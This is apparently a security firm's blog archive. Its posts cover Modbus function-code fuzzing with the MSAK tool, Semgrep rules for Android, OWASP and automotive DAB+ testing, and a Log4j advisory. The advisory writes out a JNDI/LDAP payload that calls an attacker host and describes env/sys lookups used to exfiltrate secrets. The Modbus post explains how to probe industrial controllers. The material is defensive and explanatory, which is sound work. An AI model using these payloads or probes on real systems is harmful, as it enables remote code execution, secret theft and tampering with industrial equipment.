Wednesday, March 6, 2024

Testing the Security of Modbus Services


Industrial Control Systems (ICS) and Building Management Systems (BMS) support several protocols such as Modbus, BACnet, Fieldbus and so on. Those protocols were designed to provide read/write control over sensors and actuators from a central point.

Driven by our past experience with BMS, we decided to release our own methodology and the internal tool we use for proactive attack surface analysis of systems supporting the Modbus protocol.

The Modbus Protocol

Modbus is a well-defined protocol described on modbus.org. It was created in 1979 and has become one of the most used standards for communication between industrial electronic devices over a wide range of buses and networks.

It can be used over a variety of communication media, including serial lines, TCP, UDP and more.

The application layer of the protocol is quite simple. The part we are interested in, the Protocol Data Unit (PDU), is independent of the lower-layer protocols and is defined as follows:

| FUNCTION CODE | DATA |

Where FUNCTION CODE is a 1-byte value in the range 0-127 (0x00-0x7F), and DATA is a sequence of bytes whose layout depends on the function code.

Here is a set of function codes already defined by the protocol specification:


By setting a specific function code together with its expected set of data field values, it is possible to read/write the status of coils, inputs and registers, or access information about other interesting aspects such as diagnostic data.

For example, the following request queries the status of 2 coils starting from address 0x0033 on a remote device:

 \x01\x01\x00\x33\x00\x02  

Where:

| \x01 [SlaveId] | \x01 [Function Code] | \x00\x33 [Address] | \x00\x02 [Quantity] |
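
For illustration only (a minimal Python sketch, not part of the original post or of the MSAK tool), the same request can be built with the standard struct module; the CRC-16 appended on serial (RTU) links is included for completeness, while Modbus/TCP framing would use an MBAP header instead of a CRC:

import struct

def crc16_modbus(frame: bytes) -> bytes:
    """Modbus RTU CRC-16 (poly 0xA001, init 0xFFFF), appended low byte first."""
    crc = 0xFFFF
    for byte in frame:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0xA001 if crc & 1 else crc >> 1
    return struct.pack("<H", crc)

# Slave 0x01, function 0x01 (Read Coils), start address 0x0033, quantity 2
frame = struct.pack(">BBHH", 0x01, 0x01, 0x0033, 0x0002)
print(frame.hex())                          # 010100330002
print((frame + crc16_modbus(frame)).hex())  # full RTU frame with the CRC appended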


As can be noticed, this is quite similar to a modern API-based application, with the name of the function and its arguments:

Protocol://URL/EndPoint?Parameters=Values..

Apart from the public function codes, several codes are reserved for custom implementations and are not defined in the standard.



In particular, codes 65-72 (0x41-0x48) and 100-110 (0x64-0x6E), for a total of 19 function codes, are left to the vendor/manufacturer for custom implementations.
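
Just to enumerate the candidate ranges (a trivial Python sketch):

# 8 codes in 65-72 plus 11 codes in 100-110 = 19 user-definable function codes
custom_codes = list(range(65, 73)) + list(range(100, 111))
assert len(custom_codes) == 19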

While some vendors make the specifications of their custom functions publicly available in their manuals, with all the expected arguments and formats, others do not release any information.
From a security tester's point of view, the first questions are:

  • How can we identify if a custom Function Code is implemented but no details are available?
  • How can we find the correct set of expected arguments?
  • How can we fuzz the arguments to find security issues?

Modbus Attack Surface

As defined by the standard, if the client request contains an error, the slave responds with a specific exception code:

| 0x80 + [Request Function Code] | 0xHH [Exception Code] | ... |

Where the exception codes are the following:



This behavior can help when testing and identifying the exposed services.

In particular, the first three exceptions help in identifying the presence of a custom function code.

  • 0x01 Illegal Function: the function is not implemented (or is not available in the device's present state).
  • 0x02 Illegal Data Address: the function exists, but the provided address is wrong.
  • 0x03 Illegal Data Value: the function exists, but the provided arguments are wrong.

As you may have already guessed, 0x02 and 0x03 responses actually reveal the presence of a custom function!
On the other hand, a 0x01 response does not necessarily mean that there is no custom implementation for the requested function; it may just be unavailable in the device's current state, and confirming that requires some more analysis effort.

The Methodology

Apart from the public function codes, where it is quite easy to check for read/write access to data, we want to identify whether a set of custom function codes is implemented on a black-box system.

We identify whether a function code is implemented by analyzing the response to a probe request for each candidate function code:

for code in function_codes:
    resp = send(code)                  # probe the function code with a minimal payload
    if has_exception(resp):
        exc = exception(resp)
        if exc == 0x01:                # ILLEGAL FUNCTION
            pass                       # function (probably) does not exist
        elif exc == 0x02:              # ILLEGAL DATA ADDRESS
            pass                       # function exists!
        elif exc == 0x03:              # ILLEGAL DATA VALUE
            pass                       # function exists!
        else:
            pass                       # other exception codes


The previous pseudo-code shows the approach we use to identify whether a custom function is implemented and where we should focus fuzzing.

The Tool

Here comes M-SAK (the Modbus Swiss Army Knife), a handy command-line tool and library for scanning and identifying custom functions on a Modbus device.
MSAK is written in Python and helps in discovering and testing the exposed standard and custom services of Modbus servers/slaves over serial or TCP/IP connections.

It also offers a highly customizable payload generator that will help the tester to perform complex scans using a simple but powerful templating format.

MSAK can help in:
- finding undocumented functions 
- fuzzing the arguments in order to find security issues or weird behavior.

For example, if we want to scan all functions we can just use the Service Scan option, which probes all function codes [1-127] using the given payload and then prints a summary grouped by response:

 $ python3 msak.py -S -d '0001'
Requested Data \x01\x01\x00\x01\x91\xD8
..
Requested Data \x01\x02\x00\x01\x91\xD8
..
Requested Data \x01\x03\x00\x01\x91\xD8
...
Requested Data \x01\x64\x00\x01\x91\xD8
...
ILLEGAL DATA VALUE
1 (0x01) Read Coils [FUN_ID|ADDRESS|TOTAL NUMBER| >BHH]
2 (0x02) Read Discrete Inputs [FUN_ID|ADDRESS|TOTAL NUMBER| >BHH]
3 (0x03) Read Holding Registers [FUN_ID|ADDRESS|TOTAL NUMBER| >BHH]
4 (0x04) Read Input Registers [FUN_ID|ADDRESS|TOTAL NUMBER| >BHH]
15 (0x0F) Write Multiple Coils [FUN_ID|ADDRESS|TOTAL NUM|BYTE COUNT|BYTE VALS >BHHBN*B]
16 (0x10) Write Multiple registers [FUN_ID|ADDRESS|TOTAL NUM|BYTE COUNT|VALS >BHHBN*H]
20 (0x14) Read File Record
ACCEPTED_WITH_RESPONSE
5 (0x05) Write Single Coil [FUN_ID|ADDRESS|COIL VALUE| >BHH]
6 (0x06) Write Single Register [FUN_ID|ADDRESS|REG VALUE| >BHH]
17 (0x11) Report Server ID (Serial Line only)  [FUN_ID >B]
105 CUSTOM
ILLEGAL FUNCTION
7 (0x07) Read Exception Status (Serial Line only) [FUN_ID >B]
8 (0x08) Diagnostics (Serial Line only) [|FUN_ID|SUB_FUN|VALUES| >BHN*H]
9 CUSTOM
10 CUSTOM
11 (0x0B) Get Comm Event Counter (Serial Line only) [FUN_ID >B]
12 (0x0C) Get Comm Event Log (Serial Line only)[FUN_ID >B]
13 CUSTOM
....
ILLEGAL DATA ADDRESS
21 (0x15) Write File Record

The result shows that a custom function 0x69 (105) was found, since the device did not reply with an ILLEGAL FUNCTION exception for it. We can now try to find the correct set of arguments through fuzzing, using the following command:


$ python3 msak.py -C -d '0169{R[0,0xFF,">H"]}'

This will send one request per generated argument value (0 to 65535) and collect the responses.
In fact:
- 0x01 is the slave ID
- 0x69 is the custom service function
- R[0,0xFF,">H"] asks the payload generator to produce the sequence of argument values, each packed as a 2-byte, big-endian field (struct ">H")
- the request is sent via the serial port and the CRC is automatically computed.
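
For clarity, here is a rough Python equivalent of what the template describes (a sketch, not the MSAK implementation):

import struct

slave_id, function_code = 0x01, 0x69

# Walk the whole 16-bit argument space; ">H" packs each value as 2 bytes, big-endian.
for value in range(0x10000):
    frame = struct.pack(">BB", slave_id, function_code) + struct.pack(">H", value)
    # frame + CRC-16 (computed as in the earlier sketch) is what goes out on the serial line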

After the whole scan, MSAK will return an output similar to the following:

{
'NO_RESPONSE':
  [ ... 
   b'\x01\x69\x36\xfe',
  ...
  ], 
'ACCEPTED_WITH_RESPONSE': 
  [ b'\x01\x69\x36\xff', 
    b'\x01\x69\x37\x00',
...
  ]
}


We have found that the undocumented function responds to the argument values \x36\xff and \x37\x00!
The next step is to play with this new function and see if there's some way to abuse it...
What could go wrong if an undocumented function for firmware update is found, right?! :P

For more information, the fuzzing engine supports several template patterns, documented in the MSAK README file.

N.B.: The fuzzing template engine is also available as a separate Python library called Simple Payload Generator.

Conclusions

Although Modbus is quite an old protocol, it is still used in Building Management Systems, Industrial Control Systems and SCADA systems.
Apart from the well-defined functions to read/write sensors and controls, which can already lead to very interesting security issues, the standard leaves plenty of room for vendors to implement their own services, and those can be even more interesting from a security point of view!
That's where MSAK gives its best, by automating the boring part and leaving all the fun to the tester!

Feel free to send us your feedback and happy hacking!

Author: Stefano Di Paola 
Twitter: @WisecWisec 

Monday, October 23, 2023

Semgrep Rules for Android Application Security

Introduction

The number of Android applications has been growing rapidly in recent years. In 2022, there were over 3.55 million Android apps available in the Google Play Store, and this number is expected to continue to grow in the years to come. The expansion of the Android app market is being driven by a number of factors, including the increasing popularity of smartphones, the growing demand for mobile apps, and the ease of developing and publishing Android apps. At the same time, the number of Android app downloads is also growing rapidly. In 2022, there were over 255 billion Android app downloads worldwide.

For this reason, introducing automatic security controls during Mobile Application Penetration Testing (MAPT) activities and in the CI phase is necessary to ensure the security of Android apps, by scanning for vulnerabilities before changes are merged into the main repository.


Decompiling Android Packages

The compilation of Android applications is a multi-step process that involves different bytecodes, compilers, and execution engines. Generally speaking, a common compilation flow is divided into three phases:

  1. Precompilation: The Java source code (".java") is converted into Java bytecode (".class").
  2. Postcompilation: The Java bytecode is converted into Dalvik bytecode (".dex").
  3. Release: The ".dex" and resource files are packed, signed and compressed into the Android App Package (APK).

Finally, the Dalvik bytecode is executed by the Android runtime (ART) environment.

Generally, the target of a Mobile Application Penetration Testing (MAPT) activity is in the form of an APK file. The decompilation of both of the aforementioned bytecodes is possible and can be performed with tools such as Jadx.

jadx -d ./out-dir target.apk


OWASP MAS

The OWASP MAS project is a valuable resource for mobile security professionals, providing a comprehensive set of resources to enhance the security of mobile apps. The project includes several key components:
  • OWASP MASVS: This resource outlines requirements for software architects and developers who aim to create secure mobile applications. It establishes an industry standard that can be used as a benchmark in mobile app security assessments. Additionally, it clarifies the role of software protection mechanisms in mobile security and offers requirements to verify their effectiveness.
  • OWASP MASTG: This comprehensive manual covers the processes, techniques, and tools used during mobile application security analysis. It also includes an exhaustive set of test cases for verifying the requirements outlined in the OWASP Mobile Application Security Verification Standard (MASVS). This serves as a foundational basis for conducting thorough and consistent security tests.
  • OWASP MAS Checklist: This checklist aligns with the tests described in the MASTG and provides an output template for mobile security testing.
OWASP MAS
https://mas.owasp.org/


Semgrep

Semgrep is a Static Application Security Testing (SAST) tool that performs intra-file analysis, allowing you to define code patterns for detecting misconfigurations or security issues by analyzing one file at a time in isolation. Some advantages of using Semgrep include:

  • It does not require the source code to be uploaded to an external cloud.
  • It does not require the target source code to be buildable or to have all its dependencies available; it can work on a single source file.
  • It is exceptionally fast.
  • It allows you to write your own custom patterns very easily.
Once Semgrep is integrated into your CI pipeline, it automatically scans your code for potential vulnerabilities every time you commit changes. This helps identify and address vulnerabilities early in the development process, improving your software's security.

Key Insights on Semgrep

First of all, install Semgrep with the following command:
python3 -m pip install semgrep
Semgrep accepts two fundamental inputs:
  • Rules collection: a collection is composed of ".yaml" files, alternatively referred to as "rules". A rule includes a series of patterns designed to identify or exclude specific elements within the target source code.
  • Target source code: this denotes the source code subject to analysis. It may also encompass partial code or code with certain dependencies omitted.
The four main pattern elements you can use inside a Semgrep rule are the following:
  • ... : matches a sequence of zero or more items such as arguments, statements, parameters, fields, characters.
  • "..." : matches any single hardcoded string.
  • $A : matches variables, functions, arguments, classes, object methods, imports, exceptions, and more.
  • <... e ...> : matches an expression ("e") that could be deeply nested within another expression.
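
As a quick, hypothetical illustration (a Python target, not one of the project's Android rules), a pattern such as requests.get($URL, ..., verify=False) combines these elements: $URL binds the first argument and ... absorbs any arguments in between:

import requests

# pattern: requests.get($URL, ..., verify=False)
requests.get("https://example.com", verify=False)              # match: "..." absorbs zero extra arguments
requests.get("https://example.com", timeout=5, verify=False)   # match: "..." absorbs timeout=5
requests.get("https://example.com")                            # no match: verify=False is missing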

Moreover, Semgrep provides several experimental modes that could be really useful in more difficult situations:
  • taint: enables the data-flow analysis feature, allowing you to specify sources and sinks.
  • join: allows using multiple rules on more than one file and joining the results.
  • extract: allows working with source files that contain different programming languages.
Suppose you have a rules collection in the directory "myrules/" and target source code in "mytarget/". Launching a Semgrep scan is very simple:
semgrep -c ./myrules ./mytarget

Wednesday, June 21, 2023

A Cool New Project: Semgrep Rules for Android Apps Security

Android Logo with a key like shape to introduce security.

In today's digital landscape, mobile application security has become a paramount concern.

With the increasing number of threats targeting Android applications and the personal data they store, developers and security professionals alike are seeking robust solutions to fortify their code against potential vulnerabilities.

That's why reducing the time and effort needed to identify mobile security issues has become so important.

We are excited to introduce our new project, focused on creating Semgrep rules specifically designed to enhance the security of Android apps.

Semgrep Rules for Android Application Security

The project provides a new set of rules mapped to the OWASP Mobile Security Testing Guide (MSTG) that will help find security issues using static code analysis (SAST).

The Project

The OWASP Mobile Security Testing Guide (MSTG) is an invaluable resource for assessing the security posture of mobile applications. It provides comprehensive guidelines and best practices to identify and address potential security weaknesses. However, manually conducting these tests can be time-consuming and prone to human error. 

This is where this project comes into play.

By creating a set of Semgrep rules based on the OWASP Mobile Security Testing Guide, we aim to automate and streamline the security testing process for Android applications. 

These rules act as a way to shift left in the SDLC of Mobile apps, enabling developers and security practitioners to efficiently identify and mitigate vulnerabilities in their code. 

With Semgrep's static analysis capabilities and the knowledge base of the MSTG, we can significantly enhance the effectiveness and efficiency of mobile apps security assessments. 

Our project bridges the gap between theory and practice, empowering developers to build robust and resilient Android applications while ensuring that security remains a top priority.

Status

Since the beginning of the project to the present stage, we have continuously strived to deliver a solution that empowers developers and security practitioners to defend against evolving threats and safeguard user data.

The current status of the project, showing where it is going to be improved and where a Semgrep version limitation is a blocker to creating a useful rule, is shown here, and it will be updated as soon as each improvement is implemented.




Check it out now!

How to contribute:

In future posts we'll give some insight and explain how everyone can contribute to the project, in the meantime, your feedback is absolutely welcome! 

We strongly believe in the power of collaboration and community involvement, hence we invite developers, security enthusiasts, and Android app experts to actively contribute to our project through our GitHub repository. 

By participating in the project, you can contribute new Semgrep rules, suggest improvements to existing rules, report bugs, or even share insights and ideas to enhance the overall effectiveness of our Android app security framework. 

Visit our GitHub repository to explore the project, engage with fellow contributors, and make a meaningful impact in the field of mobile app security. 

Credits





Monday, March 27, 2023

20 years of Software Security: threats and defense strategies evolution

 Software security has come a long way in the past two decades. With the advent of new technologies and a rapidly evolving threat landscape, defending against cyber attacks has become more challenging than ever before. We recently presented on the evolution of software security threats and defense strategies at the Security Summit in Milan on 15th March 2023. In this blog post, we'll explore some of the key takeaways from the presentation.

In the early 1990s, the Internet was still in its infancy, and most people accessed it through their workstations or personal computers. Security threats were relatively simple, and malware and viruses were typically spread through floppy disks or infected email attachments. As the Internet became more ubiquitous, so did the security threats. In the early 2000s, browser-based attacks became more common, and operating systems became a prime target for cyber criminals.

With the rise of mobile devices in the 2010s, new security challenges emerged. Smartphones and tablets became a popular target for attackers, and the proliferation of internet-connected devices made it easier than ever for hackers to find vulnerabilities. The number of devices and users increased rapidly, creating a larger attack surface for hackers to exploit.

Fast forward to 2020, and the Internet of Things (IoT) and automotive industries are the new frontiers of software security. IoT devices such as home assistants, smart thermostats, and security cameras are often poorly secured and easily hacked. Automotive software is becoming increasingly complex, with hundreds of millions of lines of code running on modern cars. The increasing use of artificial intelligence (AI) and machine learning (ML) in software also presents new security risks.

The timing for a successful attack has also changed dramatically over the years. In the past, attackers had to rely on users to download and execute malicious software. Today, many attacks are automated and can happen in real-time, targeting vulnerable devices as soon as they connect to the Internet.

As software becomes more integrated into our lives, the security risks also increase. In the past, a security breach might have resulted in the loss of some data or a temporary disruption in service. Today, a security breach could have much more serious consequences, including the loss of life in the case of critical infrastructure or autonomous vehicles.

The evolution of the software security approach is as important as the evolution of the software security scenario itself. In the early days of software development, security was not given much importance. But as the importance of technology grew, the security risks also grew, which led to the evolution of the software security approach.




Let's take a look at the three stages of software security approach evolution:

See the report as a punishment:
In the early days of software development, software security was not considered a priority. Most developers focused on creating functional and feature-rich applications without thinking about the security aspects. Security audits were conducted only after the software was developed and ready for deployment. These audits were seen as a punishment, rather than a proactive measure to ensure security. This approach was ineffective and led to many security breaches.

Testing solves everything:
The second stage of software security approach evolution was the belief that testing could solve all security issues. Developers started to incorporate testing tools into the software development process to detect vulnerabilities early on. The testing tools were seen as a panacea for all security issues. While testing tools are useful in identifying vulnerabilities, they are not foolproof. 


Fixing! What is fixing? Testing is not enough?
The third and current stage of software security approach evolution is the belief that fixing vulnerabilities is crucial to ensuring software security. Developers now understand that fixing vulnerabilities is a continuous process that must be carried out throughout the software development lifecycle. Developers have now started to incorporate security measures into the design and development of software to prevent vulnerabilities from being introduced in the first place.

Moreover, developers are now also adopting a "shift left" approach to software security, where security is integrated into the software development process from the very beginning. Developers are also relying on security tools and techniques such as threat modeling, code reviews, and penetration testing to detect and fix vulnerabilities.


Common mistakes over the last 20 years from our experience.

One of the biggest mistakes made in the last 20 years is the blame placed solely on developers for security issues. This approach is ineffective and unfair: developers cannot be solely responsible for security, which requires a multi-faceted approach.

Another common mistake is the testing methodology. Testing should be integrated into the development process, and not performed separately. If testing is conducted separately, there is a high risk of delivering software that has not been tested adequately.

Fixing: what is fixing? Fixing is a crucial aspect of software security. The time taken to remediate security vulnerabilities is often too long. Instant security feedback is necessary in modern software projects. Security must be shared, and data about threats, defenses, vulnerabilities, and attacks must be made public to be effective.

Software security is not just one person's responsibility, but everyone's. Security champions are essential in supporting developers and others. They can help to make decisions about when to engage the security team, triage security bugs, and act as the voice of security for a given product or team.


To help organizations address these challenges, the Open Worldwide Application Security Project (OWASP) has developed several frameworks, including OWASP Open SAMM and the recently launched OWASP Software Security 5D Framework.

Traditionally, secure software development lifecycle (SDLC) frameworks like Microsoft SDL, BSIMM, the Touchpoints, and OWASP SAMM have been used to assess software security. However, on their own these frameworks do not cover the level of awareness, the security team, the security standards, and the security testing tools needed to address today's challenges.

The OWASP Software Security 5D Framework is designed to help companies understand the need to grow in all five dimensions simultaneously: TEAM, AWARENESS, STANDARDS, PROCESSES, and TESTING.

 



The OWASP 5D framework is more practical and focuses on evaluating the maturity of a software security framework in all five dimensions simultaneously, rather than just one or two. The framework helps organizations measure their company culture on software security, enforce trust relationships between their company and clients, demonstrate improvements, and have a vision of how to manage their software security roadmap.


One of the key benefits of the OWASP 5D framework is that it enables organizations to create a software security strategy that takes into account the maturity level of their outsourcers. By doing so, they can ensure that the outsourcer is implementing HTTPS, using OWASP guidelines, and conducting penetration testing as part of the software development lifecycle. Additionally, OWASP SAMM assessment and 5D framework are standards that allow organizations to assess their software security maturity level and communicate it to clients and stakeholders effectively.

In conclusion, The OWASP Software Security 5D Framework helps you to:

  • Measure your company culture on SwSec (not your number of vulnerabilities!)
  • Enforce the trust relationships between your company and your clients
  • Demonstrate your improvements
  • Have a vision of how to manage your Software Security roadmap

Everyone in the organization is responsible for software security, and OWASP frameworks like the Software Security 5D Framework and OWASP SAMM Assessment can help organizations create a software security strategy that addresses the challenges associated with software security today.

Please send an email to: SwSec5D@mindedsecurity.com to request your copy of the presentation.

 

 

Friday, February 24, 2023

OWASP Global AppSec Dublin 2023: WorldWide and Threat Modeling


The OWASP Global AppSec Dublin 2023 conference was a truly inspiring event for anyone involved in application security. As an attendee, I was able to catch up with OWASP colleagues and hear from experts on a range of topics. 
In particular, there were two themes that really stood out to me: worldwide and threat modeling.

OWASP: The Open Worldwide Application Security Project

During the conference, the OWASP Board made an exciting announcement regarding the meaning of the letter "W" in OWASP. Traditionally, the "W" in OWASP has stood for "Web," reflecting the organization's initial focus on web application security. The Board announced they are changing the meaning of the "W" to "Worldwide," reflecting the global nature of the OWASP project and its mission.

This change is significant because it recognizes that application security is no longer limited to just web applications. With the proliferation of mobile and IoT devices, cloud computing, and other emerging technologies, application security has become a much broader concern. By changing the meaning of the "W" to "Worldwide," OWASP is acknowledging this reality and expanding its focus to include all types of applications. 
 
The change in the meaning of the "W" in OWASP from "Web" to "Worldwide" is a significant development for the organization and the application security community as a whole. It reflects the evolving nature of application security and the importance of the global community in addressing these challenges. I am excited to see how this change will shape the future of OWASP and its mission to make software security visible worldwide.

Threat Modeling

Threat modeling is a structured approach for identifying, quantifying, and addressing the security risks associated with an application. In recent years, there has been a growing interest in this area.

The conference featured a keynote, a training session and two talks on threat modeling. The keynote, “A Taste of Privacy Threat Modeling” by Kim Wuyts, focused on privacy threat modeling. Ms. Wuyts spoke about how to identify potential privacy threats and how to mitigate those risks. She also provided insights into best practices for threat modeling in a privacy context.
 
Other talks at the event emphasized practical approaches to threat modeling that are essential for companies to adopt in order to develop more secure products and services. These presentations provided valuable insights and actionable recommendations that can help organizations improve their security posture and better protect their customers' data and privacy.

Threat modeling is not a new concept. In fact, it has been around for quite some time. However, it has only recently gained traction within the application security community. This is likely due to the increasing number of data breaches and cyber attacks that have occurred in recent years. Organizations are now more aware than ever of the need to secure their applications against potential threats.
 
Since the inception of our company in 2007, we have been advocating for the promotion of Threat Modeling activities. However, it was only in recent years that we have observed a significant increase in interest in this area. The growing discourse around Threat Modeling indicates a broader recognition of its importance in ensuring the security of software and systems.

More information about threat modeling:
 
 

Testability patterns for web applications, a new OWASP Project

TESTABLE is an EU-funded project under the Horizon 2020 Research and Innovation Actions program, designed to address the significant challenge of building and maintaining secure and privacy-friendly modern web-based and AI-powered application software systems.

IMQ Minded Security is part of the TESTABLE consortium together with CISPA, Eurecom, TUBS, UC3M, SAP SE, ShiftLeft GmbH,  NortonLifeLock and Pluribus One.

We would like to express our appreciation to Luca Compagna, Senior Scientist and Research Architect at SAP Security Research, for his insightful presentation on a new OWASP project aimed at making our Testability Patterns for Web Applications accessible and improvable by the wider community.

During the presentation, Luca emphasized the critical role of testability in ensuring the security and privacy of Web Applications, and demonstrated our approach in the context of Static Application Security Testing (SAST). Specifically, we provided concrete examples of SAST testability patterns and how they can hinder the analysis of web application code by state-of-the-art SAST tools.

He also showcased our open source framework for implementing these patterns, which enables the evaluation of SAST tools against the testability patterns, highlighting which patterns pose problems for specific tools. Additionally, the framework enables the identification of testability patterns within the source code of web applications, informing developers of areas that may prove challenging for SAST.

Towards the end of the presentation, he introduced the three main target audience groups: web developers, SAST tool developers, and security central teams. For each group, we highlighted the value-added by these SAST patterns and provided guidance on how they can participate in our project community and contribute to the creation and maturation of testability patterns. Finally, we presented our plan for the OWASP project.

More information regarding testable:
 
 
You can see all the conference videos here.


Thursday, July 28, 2022

UN ECE 155 Threats in the real world: Wireless Networking Attacks and Mitigations. A case study


On March the 31st, I gave a quick talk on automotive security at VTM titled "UN ECE 155 Threats in the real world: Wireless Networking Attacks and Mitigations. A case study" (slides here).

The idea was to create some content about one of the most hyped topics in the automotive cyber security world over the last year, without keeping it just theoretical:

UN/ECE 155 and ISO/SAE 21434, whose concern is the implementation of a CSMS (Cyber Security Management System), which consists in performing, for each vehicle, several high-level security tasks such as Threat Analysis and Risk Assessment (TARA), supply chain security issue tracking, implementation of mitigations, update management and so on.

The following schema shows the product development lifecycle model, called V-Model, used in the automotive industry and the cybersecurity processes in each phase of the V-Model.

 

The most interesting activity for mitigating the risks and performing attack surface analysis is the TARA, which can really help minimize risk at the earliest stage. In particular, it gives its best when the technologies that are going to be implemented are well known from a security perspective.

The following figure describes the steps that must be covered to perform a TARA according to ISO 21434:


Since the audience was expected to be mixed technical/non-technical, I decided to keep the talk in the middle as well, which, alas, sometimes means the hard way.

Also, how to go practical without going vehicle specific? mmm, take something that is already on every vehicle and talk about attacks, risks and remediations in the context of UNECE R155 and ISO 21434 requirements.

Digital Radio Broadcasting! 

Now, the problem is to research those topics without being too obvious and to condense everything into a limited span of 30 minutes, which is quite challenging.

With the goal of identifying some unexplored attack surface, I took a couple of weeks to go through the RDS and DAB+ specifications and the previous research on them in the security context.

As briefly described in the slides, at IMQ Minded Security we created a lab testbed with:

  • An RDS transmitter using a Raspberry Pi and this wonderful piece of software
  • Several non-automotive RDS receivers and their software, and a Renault Scenic 2015 head unit with RDS support.
  • A DAB+ transmitter using a HackRF One, and this essential set of software together with this very useful tutorial
  • An RTL-SDR for local tests and a DAB+ USB dongle receiver that is also used in the automotive world with DAB-Z, the most used Android Automotive OS DAB software, plus several other applications that are mostly used in desktop environments. Alas, apart from DAB-Z we had no immediately available automotive head units supporting DAB+ :/.
The threats were identified after reading the whole RDS and DAB+ documentation and condensed for the talk.

The most interesting turned out to be DAB+, which has a much larger attack surface and already has at least one known real-world issue.



The next step was to identify a number of possible threats and attacks by studying the DAB+ specifications; a subset of the tests was shown during the talk:


Apart from creating filenames with no extension, we identified several more possible attacks on parsers, such as creating malformed Unicode filenames, EPG, Journaline and other DAB+-defined formats.
The stumbling block when going practical was that some of those formats were not implemented by the receivers we tested, so we decided to keep those tests for future activities.

Results

The most interesting issues were found on DAB+ desktop software, resulting in path traversal and HTML injection.




Unfortunately, the lack of head units or vehicles prevented us from performing more thorough tests to get some juicier stuff.
Let's see what the next few weeks bring, since we are expecting new hardware to perform more tests!

PS: We were expecting to have a video of the talk to publish, but it's not clear when (or if) it will be available, so here are the slides of the talk:

Feel free to comment or contact us for any question!

Tuesday, December 14, 2021

The Worst Log Injection. Ever. (Log4j [2.0.0-alpha,2.14.1] )

There has been quite a lot of hype about the Log4j issue, and since IMQ Minded Security's mission has always been about fixing, this informal post is about what's going on, how to check whether a system is likely affected and how to fix the issue.

UPDATE 12-17-2021: Since several bypasses of the mitigations implemented in versions 2.15/2.16 were found, be sure to update to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later), as described here and here, ASAP!

What's the Buzz? (The Problem)

On Thursday 12/09/2021 a vulnerability affecting a very popular Java logging library was published on GitHub. A few hours later the infosec community was on fire.

The issue falls in the category of Template Language Injection, which involves a parser that is triggered to perform certain actions when particular sequences are found in the parsed string.

The library is Log4j and the vulnerable methods (sinks) are the ones that are usually called to actually log messages in files to keep track of events happening during the execution of an application:
  • log
  • fatal
  • error
  • warn
  • trace
  • ..


This means that if the application wants to log some dynamic content coming from an external source, such as a message about a failed login for a non-existent username, it might call something like:

logger.warn(username + " not found!");

If the username value is controlled by a malicious user it will be possible to exploit the vulnerability and even execute arbitrary code on the affected platform.

In particular, if an attacker is able to control the log message string, even partially, and can inject the '${' and '}' metacharacters, the Log4j Interpolator will parse the content and look for specific patterns.

According to the Interpolator class, the following lookup patterns are enabled by default:
  • log4j
  • sys 
  • env
  • main
  • marker
  • java
  • lower
  • upper
  • date
  • ctx
  • jndi (if org.apache.logging.log4j.core.lookup.JndiLookup is present)
  • web (if org.apache.logging.log4j.web.WebLookup is present)
  • docker 
  • spring
  • kubernetes

So, the real deal is the attack that can be performed via the JNDI:LDAP keyword (or similar patterns such as RMI, COS, etc.). In fact, by injecting something like:

${jndi:ldap://EVILLDAP:[PORT]/XX}

as argument to the sink method, Log4j will:

1. trigger a DNS request to resolve the EVILLDAP hostname;
2. perform an LDAP request to the (attacker controlled) LDAP server hosted on the resolved IP;
3. the attacker controlled LDAP server will then be able to reply with a malicious serialized Java object, which will be deserialized and executed on the Log4j side;
4. if the malicious object, by abusing internal features (gadgets), is able to trigger the correct set of instructions, the vulnerability will be successfully exploited.

As can be noted, this is a two-stage attack: after the vulnerability is triggered, the vulnerable application needs to send a request to the malicious server in order to fetch the RCE payload.

What's the Impact and How about the Risk? (The Attack)

The worst impact is Remote Code Execution, which requires that:

1. the victim machine is able to perform outbound requests;
2. the attacker is able to use the correct gadget chain to successfully perform the attack.

Another important impact is the exfiltration of confidential information via other patterns such as:
  • env:KEY
  • sys:KEY
  • ctx:KEY
  • web:KEY
  • ..
in conjunction with DNS requests or other layer 7 requests. This second attack only requires that:
1. the victim machine is allowed to perform DNS requests or other outbound requests.
In this second attack the attacker will be able to gather information such as internal cryptographic keys or similar data from application-mapped strings.
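
For instance (a hypothetical illustration, not from the original advisory; SECRET_KEY and attacker.example are placeholders), an exfiltration payload abusing the env lookup could leak an environment variable through the DNS resolution of the callback host:

${jndi:ldap://${env:SECRET_KEY}.attacker.example/x}

Here the value of the hypothetical SECRET_KEY variable ends up in the hostname of the DNS query observed by the attacker, even if no LDAP connection is ever completed.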

Which Version is Affected?

All versions of Apache Log4j 2 up to (and excluding) 2.15.0 are affected.

In particular: 2.0-beta9 <= Apache Log4j <= 2.14.1

Log4j version 1 might be affected in some specific configurations where JNDI is enabled, but it is not enabled by default.

WARNING: there are a bunch of blog posts asserting that some Java versions mitigate the attack, but that is NOT true. The vulnerability is independent of the Java version.

Am I Vulnerable? (The Check)

There are several ways to check whether any of the deployed applications are vulnerable... the correct long-term answer would be to implement Supply Chain Management, but this paragraph is about practical, urgent actions.

If you have already implemented a process which allows you to list:

  • *all* your applications and their versions
  • *where* they are deployed

then that list is called an SBOM (Software Bill of Materials): a list of all the software in use, libraries included, and their versions.
If you have it, there is a very good chance that the time spent to find & fix everything will be relatively small.

But, of course, having it depends on the maturity of the security process implemented in your company (check this out if you're interested in our services).

Consider an enterprise without an SBOM. It might have hundreds of deployed applications, from external vendors and internally developed custom software, meaning a big effort in time and resources to prioritize and patch.

If no SBOM is in place, then the first thing to do is to roll up your sleeves and, for each instance:

  1. Log in.
  2. Check whether there are running Java processes.
  3. Identify the directories and use the open source OWASP Dependency Check (or similar products).

OWASP Dependency Check is able to recursively check for vulnerable libraries in EAR/WAR/JAR deployed applications and also in other files such as pom.xml.
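
As a rough complement to Dependency Check (a triage sketch only, assuming jars are reachable on the filesystem and not shaded into fat jars; the /opt/apps path is a hypothetical example), a quick sweep for log4j-core jars by filename can help with a first pass on a single host:

import re
from pathlib import Path

# Naive triage: flag log4j-core 2.x jars older than 2.15.0 by filename.
# It will miss shaded/renamed jars; Dependency Check (or unzipping the jar
# and looking for JndiLookup.class) is more reliable.
VERSION = re.compile(r"log4j-core-(\d+)\.(\d+)\.(\d+)\.jar$")

for jar in Path("/opt/apps").rglob("log4j-core-*.jar"):   # adjust the root path
    match = VERSION.search(jar.name)
    if not match:
        continue
    major, minor, patch = map(int, match.groups())
    if major == 2 and (minor, patch) < (15, 0):
        print(f"Potentially vulnerable: {jar}")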

